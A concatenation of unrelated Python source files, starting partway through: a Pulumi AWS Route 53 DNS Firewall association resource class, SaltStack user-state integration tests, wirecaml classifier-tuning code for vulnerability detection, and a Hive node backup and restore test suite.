```sh
$ pulumi import aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation example rslvr-frgassoc-0123456789abcdef
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResolverFirewallRuleGroupAssociationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Route 53 Resolver DNS Firewall rule group association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_resolver_firewall_rule_group = aws.route53.ResolverFirewallRuleGroup("exampleResolverFirewallRuleGroup")
example_resolver_firewall_rule_group_association = aws.route53.ResolverFirewallRuleGroupAssociation("exampleResolverFirewallRuleGroupAssociation",
firewall_rule_group_id=example_resolver_firewall_rule_group.id,
priority=100,
vpc_id=aws_vpc["example"]["id"])
```
## Import
Route 53 Resolver DNS Firewall rule group associations can be imported using the Route 53 Resolver DNS Firewall rule group association ID, e.g.
```sh
$ pulumi import aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation example rslvr-frgassoc-0123456789abcdef
```
:param str resource_name: The name of the resource.
:param ResolverFirewallRuleGroupAssociationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResolverFirewallRuleGroupAssociationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResolverFirewallRuleGroupAssociationArgs.__new__(ResolverFirewallRuleGroupAssociationArgs)
if firewall_rule_group_id is None and not opts.urn:
raise TypeError("Missing required property 'firewall_rule_group_id'")
__props__.__dict__["firewall_rule_group_id"] = firewall_rule_group_id
__props__.__dict__["mutation_protection"] = mutation_protection
__props__.__dict__["name"] = name
if priority is None and not opts.urn:
raise TypeError("Missing required property 'priority'")
__props__.__dict__["priority"] = priority
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if vpc_id is None and not opts.urn:
raise TypeError("Missing required property 'vpc_id'")
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["arn"] = None
super(ResolverFirewallRuleGroupAssociation, __self__).__init__(
'aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None) -> 'ResolverFirewallRuleGroupAssociation':
"""
Get an existing ResolverFirewallRuleGroupAssociation resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN (Amazon Resource Name) of the firewall rule group association.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
        :param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent accidental alteration of DNS Firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResolverFirewallRuleGroupAssociationState.__new__(_ResolverFirewallRuleGroupAssociationState)
__props__.__dict__["arn"] = arn
__props__.__dict__["firewall_rule_group_id"] = firewall_rule_group_id
__props__.__dict__["mutation_protection"] = mutation_protection
__props__.__dict__["name"] = name
__props__.__dict__["priority"] = priority
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["vpc_id"] = vpc_id
return ResolverFirewallRuleGroupAssociation(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN (Amazon Resource Name) of the firewall rule group association.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> pulumi.Output[str]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> pulumi.Output[str]:
"""
        If enabled, this setting disallows modification or removal of the association, to help prevent accidental alteration of DNS Firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[int]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
|
# -*- coding: utf-8 -*-
'''
tests for user state
user absent
user present
user present with custom homedir
'''
# Import python libs
from __future__ import absolute_import
import os
import grp
# Import Salt Testing libs
from salttesting import skipIf
from salttesting.helpers import (
destructiveTest,
ensure_in_syspath,
requires_system_grains
)
ensure_in_syspath('../../')
# Import salt libs
import salt.utils
import integration
class UserTest(integration.ModuleCase,
integration.SaltReturnAssertsMixIn):
'''
    tests for the user state (absent and present)
'''
def test_user_absent(self):
ret = self.run_state('user.absent', name='unpossible')
self.assertSaltTrueReturn(ret)
def test_user_if_present(self):
ret = self.run_state('user.present', name='nobody')
self.assertSaltTrueReturn(ret)
def test_user_if_present_with_gid(self):
if self.run_function('group.info', ['nobody']):
ret = self.run_state('user.present', name='nobody', gid='nobody')
elif self.run_function('group.info', ['nogroup']):
ret = self.run_state('user.present', name='nobody', gid='nogroup')
else:
self.skipTest(
'Neither \'nobody\' nor \'nogroup\' are valid groups'
)
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_not_present(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion
        and then destroys that user.
Assume that it will break any system you run it on.
'''
ret = self.run_state('user.present', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_when_home_dir_does_not_18843(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion
        and then destroys that user.
Assume that it will break any system you run it on.
'''
HOMEDIR = '/home/home_of_salt_test'
ret = self.run_state('user.present', name='salt_test',
home=HOMEDIR)
self.assertSaltTrueReturn(ret)
self.run_function('file.absent', name=HOMEDIR)
ret = self.run_state('user.present', name='salt_test',
home=HOMEDIR)
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_nondefault(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion.
'''
ret = self.run_state('user.present', name='salt_test',
home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
@requires_system_grains
def test_user_present_gid_from_name_default(self, grains=None):
'''
        This is a DESTRUCTIVE TEST. It creates a new user on the minion.
        This is an integration test. Not all systems will automatically create
        a group of the same name as the user, but I don't have access to any
        such system to verify this.
If you run the test and it fails, please fix the code it's testing to
work on your operating system.
'''
# MacOS users' primary group defaults to staff (20), not the name of
# user
gid_from_name = False if grains['os_family'] == 'MacOS' else True
ret = self.run_state('user.present', name='salt_test',
gid_from_name=gid_from_name, home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
group_name = grp.getgrgid(ret['gid']).gr_name
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
if grains['os_family'] in ('Suse',):
self.assertEqual(group_name, 'users')
elif grains['os_family'] == 'MacOS':
self.assertEqual(group_name, 'staff')
else:
self.assertEqual(group_name, 'salt_test')
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gid_from_name(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion.
This is a unit test, NOT an integration test. We create a group of the
same name as the user beforehand, so it should all run smoothly.
'''
ret = self.run_state('group.present', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.present', name='salt_test',
gid_from_name=True, home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
group_name = grp.getgrgid(ret['gid']).gr_name
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
self.assertEqual(group_name, 'salt_test')
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('group.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gecos(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion.
It ensures that numeric GECOS data will be properly coerced to strings,
otherwise the state will fail because the GECOS fields are written as
strings (and show up in the user.info output as such). Thus the
comparison will fail, since '12345' != 12345.
'''
ret = self.run_state(
'user.present', name='salt_test', fullname=12345, roomnumber=123,
workphone=1234567890, homephone=1234567890
)
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gecos_none_fields(self):
'''
        This is a DESTRUCTIVE TEST: it creates a new user on the minion.
It ensures that if no GECOS data is supplied, the fields will be coerced
into empty strings as opposed to the string "None".
'''
ret = self.run_state(
'user.present', name='salt_test', fullname=None, roomnumber=None,
workphone=None, homephone=None
)
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
self.assertEqual('', ret['fullname'])
# MacOS does not supply the following GECOS fields
if not salt.utils.is_darwin():
self.assertEqual('', ret['roomnumber'])
self.assertEqual('', ret['workphone'])
self.assertEqual('', ret['homephone'])
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(UserTest)
|
import operator
import os
import itertools
from sklearn import svm
from sklearn import tree
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestClassifier, BaggingClassifier
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import BernoulliNB
from sklearn.tree import DecisionTreeClassifier
from wirecaml.analysis import metrics
from wirecaml.model.tan import TAN
from wirecaml.tools import config
from wirecaml.tools.ascii import print_notice, print_error
hyperparameters = {'DecisionTreeClassifier':
{'max_depth': [5, 15, 30, None],
'min_samples_leaf': [1, 2, 10, 50, 100],
'max_features': ['log2', 'sqrt', None],
'n_jobs': [-1],
'class_weight': ['balanced']},
'BernoulliNB': {
'alpha': [0.001, 0.003, 0.01, 0.03, 0.1, 1, 3, 10, 30, 100],
'binarize': [None]
},
'RandomForestClassifier':
{'n_estimators': [300, 500],
'max_depth': [5, 15, 30, None],
'min_samples_leaf': [1, 2, 10],
'max_features': ['log2', 'sqrt'],
'class_weight': ['balanced'],
'n_jobs': [-1]
},
'TAN': {'mbc': [''],
'score_type': ['BAYES']
},
'SVM':
{'C': [0.01, 0.1, 1, 10, 100],
'gamma': [0.0001, 0.01, 0.1, 1, 10, 100, 'auto'],
'kernel': ['rbf'],
'probability': [True],
'shrinking': [False],
'class_weight': ['balanced']
},
'LogisticRegression':
{'penalty': ['l1', 'l2'],
'C': [0.001, 0.01, 0.1, 1, 10, 100],
'class_weight': ['balanced'],
'n_jobs': [-1]
},
'DummyClassifier': {
'strategy': ['most_frequent', 'stratified', 'uniform']},
}
def create_model(model_type, params):
model = None
if model_type == "DecisionTreeClassifier":
model = DecisionTreeClassifier()
elif model_type == "BernoulliNB":
model = BernoulliNB()
elif model_type == "RandomForestClassifier":
model = RandomForestClassifier()
elif model_type == "TAN":
model = TAN()
elif model_type == "SVM":
model = svm.SVC()
elif model_type == "LogisticRegression":
model = LogisticRegression()
elif model_type == "DummyClassifier":
model = DummyClassifier()
if params is not None:
for parameter, value in params.items():
setattr(model, parameter, value)
if model_type == "SVM":
n_estimators = 10
# Because SVM is so slow, we use a bagging classifier to speed things up
model = BaggingClassifier(model, max_samples=1.0 / n_estimators, n_estimators=n_estimators, n_jobs=4)
return model
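# Illustrative sketch (hypothetical values): instantiating one classifier from
# the hyperparameter grid above, e.g.:
#   model = create_model("BernoulliNB", {"alpha": 0.01, "binarize": None})
# The returned estimator is unfitted; callers such as select_model() fit it.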
def select_model(language, vuln_type, X, Y):
model_type = config.get_str('model', 'Model')
params = config.get_dict('model', model_type + vuln_type + 'Params', optional=True)
model = create_model(model_type, params)
model.fit(X, Y)
if model_type == "DecisionTreeClassifier" and config.get_boolean('model', 'GenerateDecisionTreeGraph'):
create_dt_graph("%s_%s" % (language, vuln_type), model, X.columns.values)
return model
def select_best_model(X, Y, X_tuning, Y_tuning):
model_type = config.get_str('model', 'Model')
best_model_i = -1
best_auc_pr = -1
combinations = get_hyperparameter_combinations(model_type)
for i in range(len(combinations)):
print_notice("Generating model %d / %d with parameters: %s" % (1 + i, len(combinations), str(combinations[i])))
model = create_model(model_type, combinations[i])
model.fit(X, Y)
probas = model.predict_proba(X_tuning)
_, _, auc_pr = metrics.get_auc_score(Y_tuning, probas)
print_notice("Model %d has AUC-PR %.2f" % (1 + i, auc_pr))
if auc_pr > best_auc_pr:
best_model_i = i
best_auc_pr = auc_pr
print_notice("Model %d generated best AUC-PR (%.2f) with parameters: %s" % (1 + best_model_i, best_auc_pr,
str(combinations[best_model_i])))
def get_hyperparameter_combinations(model_type):
value_lists = []
parameters = []
combinations = []
for parameter, values in hyperparameters[model_type].items():
parameters.append(parameter)
value_lists.append(values)
# Get cartesian product of the hyperparameter values
for element in itertools.product(*value_lists):
combo = dict()
for i in range(len(element)):
combo[parameters[i]] = element[i]
combinations.append(combo)
return combinations
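# Illustrative sketch: for a grid like {'C': [1, 10], 'kernel': ['rbf']} the
# cartesian product yields [{'C': 1, 'kernel': 'rbf'}, {'C': 10, 'kernel': 'rbf'}].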
def select_features(X, Y):
k = config.get_int('model', 'kFeatures')
print_notice("Sorting features based on chi^2 (k=%d):" % k)
if k < 0 or k > len(X.columns):
print_error("k should be >= 0 and <= %d (n_features). Got %d." % (len(X.columns), k))
exit(-1)
skb = SelectKBest(chi2, k=k)
skb.fit_transform(X, Y)
support = skb.get_support()
n = 1
features = dict()
for col_name, score in zip(X.columns.values[support], skb.scores_[support]):
features[col_name] = score
for feature, score in sorted(features.items(), key=operator.itemgetter(1), reverse=True):
print_notice("%d. %s %.2f" % (n, feature, score))
n += 1
return X.columns.values[support]
def create_dt_graph(title, model, features):
graph_dir = config.get_str('model', 'DecisionTreeGraphDirectory')
dot_file = os.path.join(graph_dir, '%s.dot' % title)
png_file = os.path.join(graph_dir, '%s.png' % title)
print_notice("Creating Decision Tree graph in %s" % png_file)
# Write DOT file
tree.export_graphviz(model, out_file=dot_file, feature_names=features, filled=True, rounded=True, proportion=True,
node_ids=True)
# Convert DOT to PNG
os.system("dot -Tpng %s >%s" % (dot_file, png_file))
|
import json
import logging
import sys
import time
from io import BytesIO
from pathlib import Path
import requests
import unittest
from hive.main import view
from hive.main.hive_backup import HiveBackup
from hive.util.constants import INTER_BACKUP_FILE_URL, HIVE_MODE_TEST
from hive.util.error_code import NOT_FOUND
from tests_v1.hive_auth_test import DIDApp, DApp
from hive.util.did.eladid import ffi, lib
from src import create_app
logger = logging.getLogger()
logger.level = logging.DEBUG
class Hive2NodeTest(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(Hive2NodeTest, self).__init__(methodName)
@classmethod
def setUpClass(cls):
cls.stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(cls.stream_handler)
logging.getLogger("HiveBackupTestCase").debug("Setting up HiveBackupTestCase\n")
@classmethod
def tearDownClass(cls):
logging.getLogger("HiveBackupTestCase").debug("\n\nShutting down HiveBackupTestCase")
logger.removeHandler(cls.stream_handler)
def setUp(self):
logging.getLogger("HiveBackupTestCase").info("\n")
self.app = create_app(mode=HIVE_MODE_TEST)
self.app.config['TESTING'] = True
self.test_client = self.app.test_client()
self.app_id = "appid"
self.did = "did:elastos:ij8krAVRJitZKJmcCufoLHQjq7Mef3ZjTN"
self.user_did = DIDApp("didapp", "clever bless future fuel obvious black subject cake art pyramid member clump")
self.user_app_did = DApp("testapp", self.app_id,
"amount material swim purse swallow gate pride series cannon patient dentist person")
# self.host2 = "http://127.0.0.1:5000"
self.host1 = "http://127.0.0.1:5002"
self.host2 = "http://127.0.0.1:5003"
# self.docker_host1 = "http://host.docker.internal:5002"
# self.docker_host2 = "http://host.docker.internal:5003"
self.docker_host1 = "http://127.0.0.1:5002"
self.docker_host2 = "http://127.0.0.1:5003"
self.token1, self.hive_did1 = self.get_did_token(self.host1)
self.token2, self.hive_did2 = self.get_did_token(self.host2)
def json_header(self):
headers = {"Content-Type": "application/json"}
return headers
def auth_header(self, token):
headers = {"Content-Type": "application/json", "Authorization": "token " + token}
return headers
def upload_header(self, token):
headers = {"Authorization": "token " + token}
return headers
def tearDown(self):
logging.getLogger("HiveBackupTestCase").info("\n")
def assert200(self, status):
self.assertEqual(status, 200)
def parse_response(self, r):
try:
v = json.loads(r.get_data())
except json.JSONDecodeError:
v = None
return v, r.status_code
def did_auth(self, host, user_did, app_did):
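        # Sketch of the handshake this helper performs (as exercised below):
        #   1. POST /api/v1/did/sign_in with the app DID document -> challenge JWT
        #   2. parse the challenge, extracting the nonce and the hive node's DID
        #   3. build a presentation token and POST it to /api/v1/did/auth -> access_token
        #   4. POST /api/v1/did/check_token to verify the issued token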
# sign_in
doc = lib.DIDStore_LoadDID(app_did.store, app_did.did)
doc_str = ffi.string(lib.DIDDocument_ToJson(doc, True)).decode()
logging.getLogger("test_auth_common").debug(f"\ndoc_str: {doc_str}")
doc = json.loads(doc_str)
param = {"document": doc}
r = requests.post(host + '/api/v1/did/sign_in',
json=param,
headers=self.json_header())
self.assert200(r.status_code)
rt = r.json()
jwt = rt["challenge"]
# print(jwt)
jws = lib.DefaultJWSParser_Parse(jwt.encode())
# if not jws:
# print(ffi.string(lib.DIDError_GetLastErrorMessage()).decode())
aud = ffi.string(lib.JWT_GetAudience(jws)).decode()
self.assertEqual(aud, app_did.get_did_string())
nonce = ffi.string(lib.JWT_GetClaim(jws, "nonce".encode())).decode()
hive_did = ffi.string(lib.JWT_GetIssuer(jws)).decode()
lib.JWT_Destroy(jws)
# auth
vc = user_did.issue_auth(app_did)
vp_json = app_did.create_presentation(vc, nonce, hive_did)
auth_token = app_did.create_vp_token(vp_json, "DIDAuthResponse", hive_did, 60)
# print(auth_token)
logging.getLogger("test_auth_common").debug(f"\nauth_token: {auth_token}")
param = {
"jwt": auth_token,
}
r = requests.post(host + '/api/v1/did/auth',
json=param,
headers=self.json_header())
self.assert200(r.status_code)
rt = r.json()
token = rt["access_token"]
jws = lib.DefaultJWSParser_Parse(token.encode())
aud = ffi.string(lib.JWT_GetAudience(jws)).decode()
self.assertEqual(aud, app_did.get_did_string())
issuer = ffi.string(lib.JWT_GetIssuer(jws)).decode()
lib.JWT_Destroy(jws)
# print(token)
logging.getLogger("test_auth_common").debug(f"\ntoken: {token}")
app_did.set_access_token(token)
# auth_check
# token = test_common.get_auth_token()
r = requests.post(host + '/api/v1/did/check_token',
json=param,
headers=self.auth_header(token))
self.assert200(r.status_code)
return token, hive_did
def get_did_token(self, host):
token, hive_did = self.did_auth(host, self.user_did, self.user_app_did)
return token, hive_did
def init_vault_service(self, host, token):
param = {}
r = requests.post(host + '/api/v1/service/vault/create',
json=param,
headers={"Content-Type": "application/json", "Authorization": "token " + token})
self.assert200(r.status_code)
def init_backup_service(self, host, token):
param = {}
r = requests.post(host + '/api/v1/service/vault_backup/create',
json=param,
headers={"Content-Type": "application/json", "Authorization": "token " + token})
self.assert200(r.status_code)
def create_upload_file(self, host, token, file_name, data):
temp = BytesIO()
temp.write(data.encode(encoding="utf-8"))
temp.seek(0)
temp.name = 'temp.txt'
upload_file_url = "/api/v1/files/upload/" + file_name
r = requests.post(host + upload_file_url,
data=temp,
headers=self.upload_header(token))
self.assert200(r.status_code)
rt = r.json()
self.assertEqual(rt["_status"], "OK")
def upsert_collection(self, host, token, col_name, doc):
r = requests.post(host + '/api/v1/db/create_collection',
json={
"collection": col_name
},
headers=self.auth_header(token))
self.assert200(r.status_code)
r = requests.post(host + '/api/v1/db/insert_one',
json={
"collection": col_name,
"document": doc,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def add_vault_data(self, host, token):
doc = dict()
for i in range(1, 10):
doc["work" + str(i)] = "work_content" + str(i)
self.upsert_collection(host, token, "works", doc)
self.create_upload_file(host, token, "test0.txt", "this is a test 0 file")
self.create_upload_file(host, token, "f1/test1.txt", "this is a test 1 file")
self.create_upload_file(host, token, "f1/test1_2.txt", "this is a test 1_2 file")
self.create_upload_file(host, token, "f2/f1/test2.txt", "this is a test 2 file")
self.create_upload_file(host, token, "f2/f1/test2_2.txt", "this is a test 2_2 file")
def check_vault_data(self, host, token):
r = requests.post(host + '/api/v1/db/find_many',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
# print(r.json())
r1 = requests.get(host + '/api/v1/files/list/folder',
headers=self.auth_header(token))
self.assert200(r1.status_code)
# print(r1.json())
def clean_vault_data(self, host, token):
r = requests.post(host + '/api/v1/db/delete_collection',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
time.sleep(2)
r = requests.post(host + '/api/v1/db/find_many',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assertEqual(NOT_FOUND, r.status_code)
r = requests.post(host + '/api/v1/files/delete',
json={
"path": "/"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
time.sleep(2)
r = requests.get(host + '/api/v1/files/list/folder', headers=self.auth_header(token))
self.assertEqual(NOT_FOUND, r.status_code)
def save_to_backup(self, host, token, vc_json):
r = requests.post(host + '/api/v1/backup/save_to_node',
json={
"backup_credential": vc_json,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
for i in range(0, 3):
r1 = requests.get(host + '/api/v1/backup/state',
headers=self.auth_header(token))
self.assert200(r1.status_code)
rt = r1.json()
if rt["hive_backup_state"] != "stop":
time.sleep(10)
else:
self.assertEqual(rt["result"], "success")
return
self.assertTrue(False)
def restore_from_backup(self, host, token, vc_json):
r = requests.post(host + '/api/v1/backup/restore_from_node',
json={
"backup_credential": vc_json,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def active_backup_vault(self, host, token):
r = requests.post(host + '/api/v1/backup/activate_to_vault',
json={
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def test_1_save_restore_hive_node(self):
self.init_vault_service(self.host1, self.token1)
self.add_vault_data(self.host1, self.token1)
self.check_vault_data(self.host1, self.token1)
self.init_backup_service(self.host2, self.token2)
vc = self.user_did.issue_backup_auth(self.hive_did1, self.host2, self.hive_did2)
vc_json = ffi.string(lib.Credential_ToString(vc, True)).decode()
self.save_to_backup(self.host1, self.token1, vc_json)
self.clean_vault_data(self.host1, self.token1)
self.restore_from_backup(self.host1, self.token1, vc_json)
time.sleep(2)
self.check_vault_data(self.host1, self.token1)
# active test
self.init_vault_service(self.host2, self.token2)
self.active_backup_vault(self.host2, self.token2)
self.check_vault_data(self.host2, self.token2)
def test_2_classify_restore_files_same(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_get_list, file_patch_list, file_delete_list = HiveBackup.classify_restore_files(saved_file_list,
local_file_list,
vault_folder)
self.assertFalse(file_get_list)
self.assertFalse(file_patch_list)
self.assertFalse(file_delete_list)
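    # The next test sketches the classification rules asserted below: entries
    # present only in saved_file_list are fetched, entries whose hash differs
    # between saved and local are patched, and local-only entries are deleted.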
def test_2_classify_restore_files(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
